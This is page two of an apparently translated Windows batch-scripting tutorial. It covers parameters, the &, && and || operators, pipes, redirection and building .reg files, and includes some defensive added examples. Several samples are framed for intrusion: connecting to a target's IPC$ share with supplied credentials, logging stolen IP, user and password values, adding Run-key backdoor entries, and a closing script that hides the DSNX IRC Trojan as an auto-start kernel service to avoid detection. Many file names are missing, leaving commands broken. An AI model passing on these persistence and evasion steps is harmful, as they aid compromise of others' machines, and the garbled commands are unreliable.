SoFunction
Updated on 2025-04-10

A collection of more complete batch processing tutorials page 2/2


2. How to use parameters in batch files
Batch files can take parameters, referred to as %1 through %9. When there are more than nine parameters you need the shift command to move through them; this is rare, so we don't cover it here.
sample1: 
@echo off 
if "%1"=="a" format a: 
:format 
@format a: /q /u /autotest 
@echo please insert another disk into drive A. 
@pause 
@goto format 
This example is used to format several floppy disks one after another, so when using it you need to enter a in the DOS window. Haha, it seems a bit redundant~^_^
sample2: 
When we want to establish an IPC$ connection, we always have to type a long command, and it is easy to mistype it. So we might as well write the fixed commands into a batch file and pass the target's IP, password and username to it as parameters, so we don't need to retype the commands every time.
@echo off 
@net use \\%1\ipc$ "%2" /u:"%3" 
@if errorlevel 1 echo connection failed 
Note that here the password is the second parameter (%2) and the username is the third (%3).
How about it, using parameters is relatively simple, isn't it? You are so clever, you must have learned it by now ^_^
No.3
3. How to use Compound Command

1. &

Usage: First Command & Second Command [& Third Command...]

This method runs multiple commands one after another on a single line, regardless of whether each command succeeds.

Sample: 
C:\>dir z: & dir c:\Ex4rch 
The system cannot find the path specified. 
Volume in drive C has no label. 
Volume Serial Number is 0078-59FB 

Directory of c:\Ex4rch 

2002-05-14 23:51 <DIR> . 
2002-05-14 23:51 <DIR> .. 
2002-05-14 23:51 14  

2. &&

Usage: First Command && Second Command [&& Third Command...]

This method also runs multiple commands in sequence, but as soon as one of them fails, the commands after it are not executed. If no error occurs, all of the commands are executed;

Sample: 
C:\>dir z: && dir c:\Ex4rch 
The system cannot find the path specified. 

C:\>dir c:\Ex4rch && dir z: 
Volume in drive C has no label. 
Volume Serial Number is 0078-59FB 

Directory of c:\Ex4rch 

2002-05-14 23:55 <DIR> . 
2002-05-14 23:55 <DIR> .. 
2002-05-14 23:55 14  
1 File(s) 14 bytes 
2 Dir(s) 768,671,744 bytes free 
The system cannot find the path specified. 

This kind of command can be useful when making backups, for example:
dir \\192.168.0.1\database\ && copy \\192.168.0.1\database\ E:\backup 
If the file exists on the remote server, the copy command runs; if the file does not exist, the copy is skipped. This usage can replace IF exist :)

3. ||

Usage: First Command || Second Command [|| Third Command...]

This method also runs multiple commands in sequence, but each following command runs only if the previous one failed; as soon as one command succeeds, the rest are not executed. If none of them succeeds, all of them are executed;

Sample: 
C:\Ex4rch>dir  || del  
Volume in drive C has no label. 
Volume Serial Number is 0078-59FB 

Directory of C:\Ex4rch 

2002-05-14 23:55 14  
1 File(s) 14 bytes 
0 Dir(s) 768,696,320 bytes free 
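
The three operators side by side, as an added example that is not code from the original article; it uses the backup scenario above, and the share path, file name and destination folder are assumptions made for this example:

```batch
@echo off
REM Added example, not code from the original article: how &, && and || decide
REM whether the next command runs, using the article's backup scenario. The
REM share path, file name and destination folder are assumptions for this example.
setlocal
set "SRC=\\192.168.0.1\database\db.bak"
set "DST=E:\backup"
if not exist "%DST%\" mkdir "%DST%"

REM &  : both commands run, the result of the first is ignored
ver >nul & echo always runs

REM && : the second runs only if the first succeeded (exit code 0)
dir "%SRC%" >nul 2>&1 && copy /y "%SRC%" "%DST%\" >nul

REM || : the second runs only if the first FAILED (exit code not 0)
dir "%SRC%" >nul 2>&1 || echo source not found, nothing copied

REM Chains are evaluated left to right, so in  a && b || c  the c branch runs
REM when EITHER a or b fails. Parenthesize to say exactly what you mean:
dir "%SRC%" >nul 2>&1 && (
    copy /y "%SRC%" "%DST%\" >nul && echo copied || echo copy failed
) || echo source missing

REM What the operators test is the exit code, the same thing errorlevel sees
dir "%SRC%" >nul 2>&1
if errorlevel 1 (echo source missing) else (echo source present)
endlocal
```

Each `dir` is silenced with `>nul 2>&1` so that only its exit code takes part in the decision.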

Examples of using combination commands:
sample: 
@copy  \\%1\admin$\system32 && if not errorlevel 1 echo IP %1 USER %2 PASS %3 >> 

4. Use of pipeline commands

1. | command
Usage: First Command | Second Command [| Third Command...]
Feeds the output of the first command to the second command as its input. Remember that this usage is very common on Unix.

sample: 
time /t>>D:\ 
netstat -n -p tcp|find ":3389">>D:\ 
start Explorer 
Did you see it? Terminal Services lets us set a custom startup program for a user; if we make that program the batch file above, every time the user logs in it records the IP address of the logged-in user.

2. >, >> Output redirection commands
Redirects the output of a command or program to a specified file. The difference between > and >> is that > clears the existing content of the file and then writes to it, while >> only appends to the file without changing what is already there.

sample1: 
echo hello world>c:\ (stupid example?) 

sample2: 
DLL Trojans are popular nowadays. We know that system32 is a good place to play hide-and-seek, and many Trojans do their best to burrow in there; DLL Trojans are no exception. To counter this, we can record the EXE and DLL files in that directory right after installing the system and the necessary applications:
Run CMD, change directory to system32, then run: dir *.exe> & dir *.dll>,
In this way the names of all EXE and DLL files are recorded in those two files.
If you later find something abnormal but cannot locate the problem with traditional methods, you should consider whether a DLL Trojan has sneaked into the system.
At that point, use the same commands to record the EXE and DLL files under system32 into another pair of files, and then run:
CMD--fc  > & fc  >. (Use the FC command to compare the DLL and EXE lists from before and after, and write the results to files.) This way we can find the extra DLL and EXE files, and then, by checking the creation time, version, whether they are packed, and so on, it is easier to determine whether a DLL Trojan has paid a visit. Ideally there will be none. If there is one, don't just DEL it: first use regsvr32 /u to unregister the backdoor DLL, then move it to the recycle bin. If the system shows no abnormal reaction, delete it completely or submit it to an antivirus company.
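
The baseline-and-compare procedure above as one script, added here as an example and not code from the original article. It lists only the additions and removals instead of a raw fc diff, and prints the creation time of each added file; the snapshot file names baseline.txt and current.txt, kept next to the script, are assumptions made for this example.

```batch
@echo off
REM Added example, not code from the original article: take a baseline of the
REM EXE/DLL names in system32 and later list what was added or removed, which
REM is the fc comparison described above. The snapshot file names baseline.txt
REM and current.txt (kept next to this script) are assumptions for this example.
setlocal
set "TARGET=%SystemRoot%\system32"
set "BASE=%~dp0baseline.txt"
set "CUR=%~dp0current.txt"

if /i "%~1"=="baseline" goto :baseline
if /i "%~1"=="compare"  goto :compare
echo usage: %~nx0 baseline ^| compare
exit /b 1

:baseline
REM /b prints bare names and /a-d skips directories; sorting gives a stable list
dir /b /a-d "%TARGET%\*.exe" "%TARGET%\*.dll" | sort > "%BASE%"
echo baseline written to "%BASE%"
exit /b 0

:compare
if not exist "%BASE%" (echo run "%~nx0 baseline" first & exit /b 2)
dir /b /a-d "%TARGET%\*.exe" "%TARGET%\*.dll" | sort > "%CUR%"

echo --- present now but not in the baseline ---
REM /v /x /i /l /g: print the lines of current.txt that do not exactly match
REM (case-insensitively, as literal strings) any line listed in baseline.txt
findstr /v /x /i /l /g:"%BASE%" "%CUR%"
if errorlevel 1 echo (none)

echo --- in the baseline but missing now ---
findstr /v /x /i /l /g:"%CUR%" "%BASE%"
if errorlevel 1 echo (none)

echo --- creation time of each added file, the first thing to check ---
for /f "usebackq delims=" %%F in (`findstr /v /x /i /l /g:"%BASE%" "%CUR%"`) do (
    dir /tc "%TARGET%\%%F" | findstr /i /c:"%%F"
)
exit /b 0
```

Run it once as `baseline` right after installation and as `compare` whenever the system behaves strangely; the baseline file should be kept somewhere an intruder cannot quietly edit it.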

3. <, >&, <&
< Read command input from a file instead of from the keyboard.
>& Writes the output of one handle to the input of another handle.
<& Read input from one handle and write it to the output of another handle.
These are not commonly used, so I won't introduce them much.

No.5 
5. How to use batch files to operate the registry

During an intrusion, specific registry keys and values are often modified to achieve certain goals, for example deleting the leftover values under Run to hide a backdoor or Trojan program, or creating a service to load the backdoor. Of course, we also modify the registry to harden the system or to change some attribute of it. All of this requires some understanding of registry operations. Let's first learn how to operate the registry with .REG files. (We can use a batch file to generate the REG file.)
The common registry operations are creation, modification, and deletion.

1. Create
Creation is divided into two types; one is creating a subkey (Subkey).

We create a file with the following content:

Windows Registry Editor Version 5.00 

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\hacker] 

Then import the file and you have created a subkey named "hacker" under HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft.

The other type is creating a value.
In this case the file format is the typical one, identical to the format of a file exported from the registry. The content is as follows:

Windows Registry Editor Version 5.00 

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] 
"Invader"="Ex4rch" 
"Door"="C:\\WINNT\\system32\\" 
"Autodos"=dword:02 

This creates three values under [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]: Invader, Door, and Autodos.
The type of Invader is "String Value"
The type of Door is "REG_SZ Value"
The type of Autodos is "DWORD Value"


2. Modify
Modification is relatively simple. Just export the value you need to modify, edit it with Notepad, and then import it again (regedit /s).

3. Delete
Let's first talk about deleting a value. We create a file like this:

Windows Registry Editor Version 5.00 

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] 
"Ex4rch"=- 

Import this file and "Ex4rch" under [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] will be deleted;

Now let's look at deleting a subkey. We create a file like this:

Windows Registry Editor Version 5.00 

[-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] 

After importing the file, [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] has been deleted (the whole key, together with every value under it).

I believe that after reading this you have basically mastered the .reg file. So our goal now is to use a batch file to create .reg files with specific content. Remember what we mentioned earlier: with the redirection symbols it is easy to create files of a specific type.

sample1: As in the example above, if you want to generate the following registry file:
Windows Registry Editor Version 5.00 

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] 
"Invader"="Ex4rch" 
"door"=hex:255 
"Autodos"=dword:000000128 
you just need to do this (the first line uses > to create the file and the rest use >> to append; a line that ends in a digit is wrapped in parentheses, because cmd reads a digit placed directly before > or >> as a file handle number and drops it from the echoed text): 
@(echo Windows Registry Editor Version 5.00)> 
@echo.>> 
@echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]>> 
@echo "Invader"="Ex4rch">> 
@(echo "door"=hex:255)>> 
@(echo "Autodos"=dword:000000128)>> 
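
Generating a .reg file from a batch script the safe way, as an added example that is not code from the original article. It also demonstrates the trap that bites a line such as `"Autodos"=dword:02` when `>>` follows the digit directly; the file names under %TEMP% and the value names are assumptions made for this example.

```batch
@echo off
REM Added example, not code from the original article: write a .reg file from a
REM batch script the safe way, and show the redirection trap: cmd treats a
REM single digit immediately before > or >> as a file handle number, so
REM "echo ...dword:02>>x.reg" echoes "...dword:0" to the screen and redirects
REM handle 2 (stderr) into x.reg instead. File names under %TEMP% are assumptions.
setlocal
set "REG=%TEMP%\remove-autorun.reg"

REM Putting the redirection FIRST keeps the whole echo text, digits included.
REM The first line uses > (create or truncate), the rest append with >>.
>  "%REG%" echo Windows Registry Editor Version 5.00
>> "%REG%" echo.
>> "%REG%" echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
REM "name"=- deletes that value on import (the article's delete example)
>> "%REG%" echo "Ex4rch"=-
>> "%REG%" echo "Autodos"=dword:00000002

echo --- %REG% now contains ---
type "%REG%"

REM The trap, for comparison: the trailing 2 is taken as handle 2, so the text
REM (minus its last digit) goes to the console and trap.reg is left empty.
set "BAD=%TEMP%\trap.reg"
echo "Autodos"=dword:00000002>"%BAD%"
echo --- size of %BAD% in bytes (expected 0) ---
for %%F in ("%BAD%") do echo %%~zF

REM Other safe forms:  (echo "Autodos"=dword:00000002)>"%BAD%"
REM                    echo "Autodos"=dword:00000002 >"%BAD%"   (trailing space)
REM Review the generated file, then import it silently with:  regedit /s "%REG%"
endlocal
```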


sample2: 
When using some older Trojans, we may create a value under [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run (Runonce, Runservices, Runexec)] in the registry to make the Trojan start automatically. However, this easily exposes the path of the Trojan program and gets it discovered. By comparison, registering the Trojan program as a system service is relatively safer. The following takes the IRC Trojan DSNX as an example (named)
@start  
@attrib +h +r  
@echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] >> 
@echo "windsnx "=- >> 
@ create Windriversrv type= kernel start= auto displayname= WindowsDriver binpath= c:\winnt\system32\ 
@regedit /s  
@del  

@REM [Delete the startup item of DSNXDE from the registry, set its file attributes to hidden and read-only, and register it as a critical system service configured to start automatically]
@REM Isn't this safer? ^_^